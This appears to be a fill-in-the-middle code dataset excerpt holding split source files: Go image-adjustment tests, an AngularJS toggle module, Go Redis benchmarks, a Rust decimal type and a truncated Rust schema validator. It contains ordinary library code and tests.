file_name
stringlengths
3
137
prefix
stringlengths
0
918k
suffix
stringlengths
0
962k
middle
stringlengths
0
812k
adjustment_test.go
package bild import ( "image" "testing" ) func TestBrightness(t *testing.T)
func TestGamma(t *testing.T) { cases := []struct { desc string gamma float64 value image.Image expected *image.RGBA }{ { desc: "1.0", gamma: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "0", gamma: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, }, }, }, { desc: "2.2", gamma: 2.2, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xba, 0xba, 0xba, 0x80, 0xba, 0xba, 0xba, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, { desc: "0.5", gamma: 0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x40, 0x40, 0x40, 0x80, 0x40, 0x40, 0x40, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, } for _, c := range cases { actual := Gamma(c.value, c.gamma) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Gamma "+c.desc, c.expected, actual)) } } } func TestContrast(t *testing.T) { cases := []struct { desc string change float64 value image.Image expected *image.RGBA }{ { desc: "1.0", change: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "1.0", change: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x40, 0x40, 0x40, 0xFF, 0x40, 0x40, 0x40, 0xFF, 0xF0, 0xF0, 0xF0, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "0.0", change: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xBA, 0xBA, 0xBA, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xBA, 0xBA, 0xBA, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "-0.5", change: -0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x7F, 0x7F, 0x7F, 0x80, 0x7F, 0x7F, 0x7F, 0xff, 0xBF, 0xBF, 0xBF, 0xff, 0x3F, 0x3F, 0x3F, 0xff, }, }, }, { desc: "0.5", change: 0.5, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0xff, }, }, }, } for _, c := range cases { actual := Contrast(c.value, c.change) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Contrast "+c.desc, c.expected, actual)) } } }
{ cases := []struct { desc string percent float64 value image.Image expected *image.RGBA }{ { desc: "+100%", percent: 1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xFF, 0xFF, 0xFF, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "+0%", percent: 0.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "+50%", percent: 0.50, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0xC0, 0xC0, 0xC0, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, { desc: "-100%", percent: -1.0, value: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, expected: &image.RGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 8, Pix: []uint8{ 0x0, 0x0, 0x0, 0x80, 0x0, 0x0, 0x0, 0xFF, 0x0, 0x0, 0x0, 0xFF, 0x0, 0x0, 0x0, 0xFF, }, }, }, } for _, c := range cases { actual := Brightness(c.value, c.percent) if !rgbaImageEqual(actual, c.expected) { t.Error(testFailMessage("Brightness "+c.desc, c.expected, actual)) } } }
drpx-toggle.js
/* DrpxToggle: .isOpen() .toggle() .open() .close() drpxToggleFactory(name): DrpxToggle # service for given name with .destroy() to remove DrpxToggleController: delegates to a DrpxToggle .toggle <ANY drpx-toggle="toggle [as scopeName]">...</ANY> controller: DrpxToggleController */ ;(function(angular) { 'use strict'; angular .module('drpxToggle', []) .factory('DrpxToggle', DrpxToggleFactory) .factory('drpxToggleFactory', drpxToggleFactoryFactory) .controller('DrpxToggleController', DrpxToggleController) .directive('drpxToggle', drpxToggleDirective) ; function DrpxToggleFactory() { /*jshint validthis:true */ function DrpxToggle() { this.opened = false; } DrpxToggle.prototype.close = close; DrpxToggle.prototype.isOpen = isOpen; DrpxToggle.prototype.open = open; DrpxToggle.prototype.toggle = toggle; function close() { // jshint ignore:line this.opened = false; } function isOpen() { return this.opened; } function open() { // jshint ignore:line this.opened = true; } function toggle() { this.opened = !this.opened; } return DrpxToggle; } drpxToggleFactoryFactory.$inject = ['DrpxToggle']; function drpxToggleFactoryFactory ( DrpxToggle ) { function drpxToggleFactory(name) { var toggle; toggle = find(name); if (!toggle) { toggle = create(name); } return toggle; } var toggles = {}; function create(name) { var toggle; toggle = new DrpxToggle(); toggle.destroy = destroy.bind(null, name); toggles[name] = toggle; return toggle; } function destroy(name) { delete toggles[name]; } function
(name) { // no 'new' name can be stored if (name === 'new') { return; } return toggles[name]; } return drpxToggleFactory; } DrpxToggleController.$inject = ['DrpxToggle']; function DrpxToggleController ( DrpxToggle ) { this.toggle = new DrpxToggle(); } drpxToggleDirective.$inject = ['drpxToggleFactory']; function drpxToggleDirective ( drpxToggleFactory ) { var directive = { restrict: 'A', controller: 'DrpxToggleController', link: link, }; var expr = /^\s*([A-Za-z]\w*)(\s+as\s+([A-Za-z]\w*))?\s*$/; function link(scope, element, attrs, controller) { var as, match, name, toggle; match = attrs.drpxToggle.match(expr); if (match) { name = match[1]; as = match[3]; toggle = drpxToggleFactory(name); if (as) { scope[as] = toggle; } controller.toggle = toggle; } } return directive; } })(angular);
find
bench_test.go
package redis_test import ( "bytes" "testing" "time" "github.com/bukalapak/go-redis" ) func benchmarkRedisClient(poolSize int) *redis.Client
func BenchmarkRedisPing(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Ping().Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkRedisSetString(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() value := string(bytes.Repeat([]byte{'1'}, 10000)) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkRedisGetNil(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Get("key").Err(); err != redis.Nil { b.Fatal(err) } } }) } func benchmarkSetRedis(b *testing.B, poolSize, payloadSize int) { client := benchmarkRedisClient(poolSize) defer client.Close() value := string(bytes.Repeat([]byte{'1'}, payloadSize)) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkSetRedis10Conns64Bytes(b *testing.B) { benchmarkSetRedis(b, 10, 64) } func BenchmarkSetRedis100Conns64Bytes(b *testing.B) { benchmarkSetRedis(b, 100, 64) } func BenchmarkSetRedis10Conns1KB(b *testing.B) { benchmarkSetRedis(b, 10, 1024) } func BenchmarkSetRedis100Conns1KB(b *testing.B) { benchmarkSetRedis(b, 100, 1024) } func BenchmarkSetRedis10Conns10KB(b *testing.B) { benchmarkSetRedis(b, 10, 10*1024) } func BenchmarkSetRedis100Conns10KB(b *testing.B) { benchmarkSetRedis(b, 100, 10*1024) } func BenchmarkSetRedis10Conns1MB(b *testing.B) { benchmarkSetRedis(b, 10, 1024*1024) } func BenchmarkSetRedis100Conns1MB(b *testing.B) { benchmarkSetRedis(b, 100, 1024*1024) } func BenchmarkRedisSetGetBytes(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() value := bytes.Repeat([]byte{'1'}, 10000) b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", value, 0).Err(); err != nil { b.Fatal(err) } got, err := client.Get("key").Bytes() if err != nil { b.Fatal(err) } if !bytes.Equal(got, value) { b.Fatalf("got != value") } } }) } func BenchmarkRedisMGet(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() if err := client.MSet("key1", "hello1", "key2", "hello2").Err(); err != nil { b.Fatal(err) } b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.MGet("key1", "key2").Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkSetExpire(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { if err := client.Set("key", "hello", 0).Err(); err != nil { b.Fatal(err) } if err := client.Expire("key", time.Second).Err(); err != nil { b.Fatal(err) } } }) } func BenchmarkPipeline(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { _, err := client.Pipelined(func(pipe redis.Pipeliner) error { pipe.Set("key", "hello", 0) pipe.Expire("key", time.Second) return nil }) if err != nil { b.Fatal(err) } } }) } func BenchmarkZAdd(b *testing.B) { client := benchmarkRedisClient(10) defer client.Close() b.ResetTimer() b.RunParallel(func(pb *testing.PB) { for pb.Next() { err := client.ZAdd("key", redis.Z{ Score: float64(1), Member: "hello", }).Err() if err != nil { b.Fatal(err) } } }) }
{ client := redis.NewClient(&redis.Options{ Addr: ":6379", DialTimeout: time.Second, ReadTimeout: time.Second, WriteTimeout: time.Second, PoolSize: poolSize, }) if err := client.FlushDB().Err(); err != nil { panic(err) } return client }
decimal.rs
// Copyright Materialize, Inc. All rights reserved. // // Use of this software is governed by the Business Source License // included in the LICENSE file. // // As of the Change Date specified in that file, in accordance with // the Business Source License, use of this software will be governed // by the Apache License, Version 2.0. //! A specialized, high-performance decimal type. //! //! This module has a somewhat unusual design that is tightly coupled to //! Materialize's requirements. It is unlikely to be useful in other contexts //! without significant refactoring. If you're looking for a self-contained //! arbitrary precision decimal library in Rust, you probably want something //! like [bigdecimal]. //! //! The design supports 128-bit fixed point decimal arithmetic. Wikipedia has a //! good overview of [fixed-point arithmetic], if you're new to the subject. The //! basic idea is to scale decimal numbers up until no fractional component //! remains. Arithmetic operations are then simple integer arithmetic //! operations. //! //! For example, suppose we want to represent the decimal number 123.45. This //! number is said to have precision 5, because it has five digits in total, and //! scale 2, because it has two digits after the decimal point. We can represent //! this number as an integer by multiplying it by 100, resulting in 12345. We //! call this resulting number the "significand." //! //! Arithmetic operations can be performed directly on the significand using //! simple integer arithmetic. For example, suppose we want to add 1.55 to //! 123.45. The corresponding significands are 155 and 12345, respectively, and //! we can sum the significands directly, resulting in 12500. To display the //! result, we divide by 100 (the inverse of the multiplication by 100 that we //! performed to construct the significands originally), resulting in the //! correct decimal result 125.00. //! //! Note that multiplication and division require more care, to account for //! shifting scales, but the basic idea of relying on integral operations on the //! significand still holds. See the Wikipedia article for details if you're //! curious. //! //! This module does *not* provide a complete implementation of fixed-point //! decimal arithmetic. The types here instead provide interoperability, i.e., //! parsing decimals from other systems and printing decimals to strings. //! //! [bigdecimal]: https://crates.io/crates/bigdecimal //! [fixed-point arithmetic]: https://en.wikipedia.org/wiki/Fixed-point_arithmetic use std::cmp::PartialEq; use std::fmt; use std::hash::{Hash, Hasher}; use std::iter::Sum; use std::ops::{Add, AddAssign, Div, Mul, Neg, Rem, Sub}; use std::str::FromStr; use failure::{bail, format_err}; use serde::{Deserialize, Serialize}; /// The significand of a decimal number with up to 38 digits of precision. /// /// `Significand`s are unintepretable without their corresponding scale, which /// indicates the location of the decimal point. You may be interested in the /// [`Decimal`] type, which bundles the significand together with its scale. /// /// The advantage of the `Significand` type is that it uses less memory by not /// redundantly storing the scale if the scale is known to be the same across /// a large collection of decimals. /// /// Note that arithmetic on significands is raw 128-bit integer arithmetic. /// Multiplying two significands, for example, will simply multiply the two /// underlying 128-bit integers. It is up to the caller to interpret the result /// semantically, e.g., accounting for the new output scale, if decimal /// multiplication was desired. #[derive(Clone, Copy, Debug, Eq, Ord, PartialOrd, Serialize, Deserialize)] pub struct Significand(i128); /// The maximum precision (i.e., number of digits) permitted in a /// [`Significand`]. Note that this includes the total number of digits, /// including the digits both before and after the decimal point. /// /// This number was chosen so that significands fit neatly in an i128. pub const MAX_DECIMAL_PRECISION: u8 = 38; impl Significand { /// Constructs a new `Significand` from an `i128`. pub fn new(d: i128) -> Significand { Significand(d) } /// Parses a `Significand` from a buffer storing the two's complement /// representation of the significand in big-endian byte order. pub fn from_twos_complement_be(input: &[u8]) -> Result<Significand, failure::Error> { if input.len() > 16 { bail!("decimal exceeds maximum precision") } let mut buf = [0; 16]; for (i, digit) in input.iter().rev().enumerate() { buf[i] = *digit; } let mut significand = i128::from_le_bytes(buf); if !input.is_empty() && input.len() < 16 && ((input[0] & 0x80) != 0) { // This is tricky. In two's-complement representation, the weight of // the high order digit is negative. If we're filling out the entire // i128, then i128::from_le_bytes has already accounted for this. // Otherwise, if the high-order bit in this particular decimal is // set, we've incorrectly used it to contribute a positive weight. // // For example, consider the one-byte number 0xba. In one-byte two's // complement, this represents -70: // // 1(-2^7) + 0(2^6) + 1(2^5) + 1(2^4) + 1(2^3) + 0(2^2) + 1(2^1) + 0(2^0) // // We'll, however, have interpreted it as 186, because we'll have // assigned the highest bit a weight of 128, instead of -128. To // compensate, we subtract twice the weight of the highest digit-- // in the example, 256. significand -= 2_i128.pow((input.len() * 8) as u32); } Ok(Significand(significand)) } /// Returns the underlying `i128`. pub fn as_i128(&self) -> i128 { self.0 } pub fn abs(&self) -> Significand { Significand(self.0.abs()) } /// Constructs a [`Decimal`] by imbuing this `Significand` with the /// specified `scale`. pub fn with_scale(self, scale: u8) -> Decimal { Decimal { significand: self.0, scale, } } } impl Add<Significand> for Significand { type Output = Self; fn add(self, other: Self) -> Self { Self(self.0 + other.0) } } impl<T> Add<T> for Significand where i128: Add<T, Output = i128>, { type Output = Self; fn add(self, other: T) -> Self { Self(self.0 + other) } } impl AddAssign<Significand> for Significand { fn add_assign(&mut self, other: Self) { self.0 += other.0; } } impl<T> AddAssign<T> for Significand where i128: AddAssign<T>, { fn add_assign(&mut self, other: T) { self.0 += other; } } impl Sub<Significand> for Significand { type Output = Self; fn sub(self, other: Self) -> Self { Self(self.0 - other.0) } } impl<T> Sub<T> for Significand where i128: Sub<T, Output = i128>, { type Output = Self; fn sub(self, other: T) -> Self { Self(self.0 - other) } } impl Mul<Significand> for Significand { type Output = Self; fn mul(self, other: Self) -> Self { Self(self.0 * other.0) } } impl<T> Mul<T> for Significand where i128: Mul<T, Output = i128>, { type Output = Self; fn mul(self, other: T) -> Self { Self(self.0 * other) } } impl Div<Significand> for Significand { type Output = Self; fn div(self, other: Self) -> Self { Self(self.0 / other.0) } } impl<T> Div<T> for Significand where i128: Div<T, Output = i128>, { type Output = Self; fn div(self, other: T) -> Self { Self(self.0 / other) } } impl Rem<Significand> for Significand { type Output = Self; fn rem(self, other: Self) -> Self { Self(self.0 % other.0) } } impl<T> Rem<T> for Significand where i128: Rem<T, Output = i128>, { type Output = Self; fn rem(self, other: T) -> Self { Self(self.0 % other) } } impl PartialEq<Significand> for Significand { fn eq(&self, other: &Significand) -> bool { self.0 == other.0 } } impl PartialEq<i128> for Significand { fn eq(&self, other: &i128) -> bool { &self.0 == other } } impl Hash for Significand { fn hash<H: Hasher>(&self, state: &mut H) { self.0.hash(state) } } impl Sum for Significand { fn sum<I>(iter: I) -> Self where I: Iterator<Item = Self>, { iter.fold(Significand::new(0), Add::add) } } impl Neg for Significand { type Output = Self; fn neg(self) -> Self::Output { Self(-self.0) } } /// A decimal number, which bundles a significand and its scale. /// /// At present, the only useful operations that `Decimal`s support are /// conversions to and from strings. This support is thought to be complete, /// however; even esoteric format string options, like padding characters and /// width, are properly handled. #[derive(Debug, PartialEq, Eq)] pub struct Decimal { significand: i128, scale: u8, } impl Decimal { /// Returns the significand of the decimal. pub fn significand(&self) -> i128 { self.significand } /// Returns the scale of the decimal. pub fn scale(&self) -> u8 { self.scale } pub fn abs(&self) -> Decimal { Decimal { significand: self.significand.abs(), scale: self.scale, } } /// Computes the floor of this decimal: the nearest integer less than or /// equal to this decimal. The returned decimal will have the same scale as /// this decimal. pub fn floor(&self) -> Decimal { let factor = 10_i128.pow(self.scale as u32); let int = self.significand / factor; let frac = self.significand % factor; let sub = if int < 0 && frac != 0 { 1 } else { 0 }; Decimal { significand: (int - sub) * factor, scale: self.scale, } } /// Computes the ceiling of this decimal: the nearest integer greater than /// or equal to this decimal. The returned decimal will have the same scale /// as this decimal. pub fn
(&self) -> Decimal { let factor = 10_i128.pow(self.scale as u32); let int = self.significand / factor; let frac = self.significand % factor; let add = if int > 0 && frac != 0 { 1 } else { 0 }; Decimal { significand: (add + int) * factor, scale: self.scale, } } /// Rounds this decimal to `places` number of decimal places, rounding half /// away from zero. The returned decimal will have the same scale as this /// decimal. pub fn round(&self, places: i64) -> Decimal { let significand = if places <= self.scale as i64 { let scale = self.scale as i64 - places; let factor = 10_i128.pow(scale as u32); rounding_downscale(self.significand, scale as usize) * factor } else { self.significand }; Decimal { significand, scale: self.scale, } } } impl FromStr for Decimal { type Err = failure::Error; fn from_str(s: &str) -> Result<Self, Self::Err> { let mut significand: i128 = 0; let mut precision = 0; let mut scale: u8 = 0; let mut seen_decimal = false; let mut negative = false; let mut seen_e_notation = false; let mut e_exponent: u8 = 0; let mut e_negative = false; let mut z = s.chars().peekable(); if let Some('-') = z.peek() { // Consume the negative sign. z.next(); negative = true; } while let Some(&ch) = z.peek() { match ch { '0'..='9' => { let digit = ch .to_digit(10) .ok_or_else(|| format_err!("invalid digit in numeric literal: {}", s))?; precision += 1; if seen_decimal { scale += 1; } significand = significand .checked_mul(10) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; significand = significand .checked_add(i128::from(digit)) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; } '.' => { if !seen_decimal { seen_decimal = true; } else { bail!("multiple decimal points in numeric literal: {}", s) } } _ => break, } z.next(); } // Check for e-notation. // Note that 'e' is changed to 'E' during parsing step. if let Some('E') = z.peek() { // Consume the e-notation signifier. z.next(); seen_e_notation = true; if let Some('-') = z.peek() { // Consume the negative sign. z.next(); e_negative = true; } while let Some(&ch) = z.peek() { match ch { '0'..='9' => { let digit = ch.to_digit(10).ok_or_else(|| { format_err!("invalid digit in numeric literal: {}", s) })?; e_exponent = e_exponent.checked_mul(10).ok_or_else(|| { format_err!("exponent in e-notation overflows u8: {}", s) })?; e_exponent = e_exponent.checked_add(digit as u8).ok_or_else(|| { format_err!("exponent in e-notation overflows u8: {}", s) })?; } _ => break, } z.next(); } } if z.peek().is_some() { bail!("malformed numeric literal: {}", s); } if precision > MAX_DECIMAL_PRECISION { bail!("numeric literal exceeds maximum precision: {}", s); } if negative { significand *= -1; } if seen_e_notation { if e_negative { scale = scale.checked_add(e_exponent).ok_or_else(|| { format_err!("numeric literal exceeds maximum precision: {}", s) })?; if scale > MAX_DECIMAL_PRECISION { bail!("numeric literal exceeds maximum precision: {}", s); } } else if scale > e_exponent { scale -= e_exponent; } else { e_exponent -= scale; scale = 0; let p = 10_i128.checked_pow(e_exponent as u32).ok_or_else(|| { format_err!( "exponent in numeric literal {} overflows i128: 10^{}", s, e_exponent ) })?; significand = significand .checked_mul(p) .ok_or_else(|| format_err!("numeric literal overflows i128: {}", s))?; } } Ok(Decimal { scale, significand }) } } fn rounding_downscale(v: i128, scale: usize) -> i128 { if scale == 0 { v } else { let factor = 10_i128.pow(scale as u32); v / factor + (v % factor) / (factor / 2) } } impl fmt::Display for Decimal { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { // NOTE(benesch): `fmt:Formatter` uses "precision" to mean "how many // digits to display to the right of the decimal point," which we call // scale. let desired_scale = f.precision().unwrap_or(self.scale as usize); // A desired scale of zero is special because it requires rounding the // integral part. For all other desired scales, the rounding instead // applies to the fractional part. if desired_scale == 0 { let ip = rounding_downscale(self.significand, self.scale as usize); f.pad_integral(ip >= 0, "", &ip.abs().to_string()) } else { let significand = self.significand.abs(); let factor = 10_i128.pow(u32::from(self.scale)); let ip = significand / factor; let mut fp = significand - (ip * factor); let mut scale = self.scale as usize; if desired_scale < scale { // The format string requests less fractional digits than // present. Round to the desired scale. fp = rounding_downscale(fp, scale - desired_scale); scale = desired_scale; } // The fractional digits must have all leading zeros present to be // correct. Consider: .07 and .7 are very different numbers. let mut buf = format!("{}.{:0width$}", ip, fp, width = scale); for _ in scale..desired_scale { // The format string requests more fractional digits than // present. Fill in the missing digits as zeros. buf.push('0'); } f.pad_integral(self.significand >= 0, "", &buf) } } } #[cfg(test)] mod tests { use super::*; fn d(s: &str) -> Decimal { s.parse().unwrap() } #[test] fn test_floor() { assert_eq!(d("100.11").floor(), d("100.00")); assert_eq!(d("99.0").floor(), d("99.0")); assert_eq!(d("-40.1").floor(), d("-41.0")); } #[test] fn test_ceil() { assert_eq!(d("100.11").ceil(), d("101.00")); assert_eq!(d("99.0").ceil(), d("99.0")); assert_eq!(d("-40.1").ceil(), d("-40.0")); } #[test] fn test_round() { assert_eq!(d("100.11").round(1), d("100.10")); assert_eq!(d("99.0").round(2), d("99.0")); assert_eq!(d("-40.1").round(0), d("-40.0")); assert_eq!(d("-40.5").round(0), d("-41.0")); assert_eq!(d("55.5555").round(-2), d("100.0000")); assert_eq!(d("55.5555").round(-3), d("0.0000")); } #[test] fn test_parse_decimal() { assert_eq!(d("123.45"), Significand::new(12345).with_scale(2)); assert_eq!(d("12345E-2"), Significand::new(12345).with_scale(2)); assert_eq!(d("-123.45"), Significand::new(-12345).with_scale(2)); } #[test] fn test_format_decimal() { let pos = Significand::new(12345).with_scale(2); assert_eq!(format!("{}", pos), "123.45"); assert_eq!(format!("{:.2}", pos), "123.45"); assert_eq!(format!("{:.3}", pos), "123.450"); assert_eq!(format!("{:.7}", pos), "123.4500000"); assert_eq!(format!("{:+}", pos), "+123.45"); assert_eq!(format!("{:8}", pos), " 123.45"); assert_eq!(format!("{:^8}", pos), " 123.45 "); assert_eq!(format!("{:z^8}", pos), "z123.45z"); assert_eq!(format!("{:0}", pos), "123.45"); assert_eq!(format!("{:08}", pos), "00123.45"); let neg = Significand::new(-12345).with_scale(2); assert_eq!(format!("{}", neg), "-123.45"); assert_eq!(format!("{:z^9}", neg), "z-123.45z"); assert_eq!(format!("{:0}", neg), "-123.45"); assert_eq!(format!("{:09}", neg), "-00123.45"); assert_eq!(format!("{}", Significand::new(0).with_scale(0)), "0"); assert_eq!(format!("{}", Significand::new(0).with_scale(5)), "0.00000"); assert_eq!(format!("{:.0}", Significand::new(-10).with_scale(5)), "0"); assert_eq!(format!("{}", Significand::new(42).with_scale(0)), "42"); assert_eq!(format!("{:.0}", Significand::new(-6).with_scale(1)), "-1"); assert_eq!(format!("{:.0}", Significand::new(-19).with_scale(1)), "-2"); assert_eq!(format!("{:.0}", Significand::new(19).with_scale(1)), "2"); assert_eq!(format!("{}", Significand::new(70).with_scale(2)), "0.70"); assert_eq!(format!("{}", Significand::new(7).with_scale(2)), "0.07"); assert_eq!(format!("{:.1}", Significand::new(45).with_scale(2)), "0.5"); assert_eq!( format!("{:.1}", Significand::new(-45).with_scale(2)), "-0.5" ); assert_eq!(format!("{:.1}", Significand::new(46).with_scale(2)), "0.5"); assert_eq!( format!("{:.1}", Significand::new(-46).with_scale(2)), "-0.5" ); } }
ceil
schema.rs
use crate::error::Error; use serde::Deserialize; use std::fmt::{Display, Formatter}; #[derive(Debug, Deserialize, Eq, PartialEq, Clone)] pub struct Schema { pub regex: String, pub filename: String, pub table: String, pub columns: Vec<Column>, } impl Schema { /// Ensures /// - only strings can be multiline enabled /// - only one multiline column allowed fn validate(&self) -> Result<(), Error> { let mut multiline_enabled = false; for column in &self.columns { if column.multiline && column.r#type != ColumnType::String { return Err(Error::InvalidMultilineType( column.name.clone(), column.r#type, )); } if column.multiline { if multiline_enabled { // found more than one multiline column let columns = self .columns .iter() .filter(|col| col.multiline) .map(|col| col.name.clone()) .collect(); return Err(Error::TooManyMultilineColumns(columns)); } else { multiline_enabled = true; } } } Ok(()) } } impl TryFrom<&str> for Schema { type Error = Error; fn try_from(value: &str) -> Result<Self, Self::Error> { let schema: Schema = serde_yaml::from_str(value)?; schema.validate()?; Ok(schema) } } #[derive(Debug, Deserialize, Eq, PartialEq, Clone)] pub struct Column { pub name: String, pub r#type: ColumnType, #[serde(default)] pub multiline: bool, } #[cfg(test)] impl Column { /// Creates a column definition pub fn new(name: impl Into<String>, column_type: ColumnType) -> Column { Column { name: name.into(), r#type: column_type, multiline: false, } } /// Creates a multiline string definition pub fn multiline_string(name: impl Into<String>) -> Column { Column { name: name.into(), r#type: ColumnType::String, multiline: true, 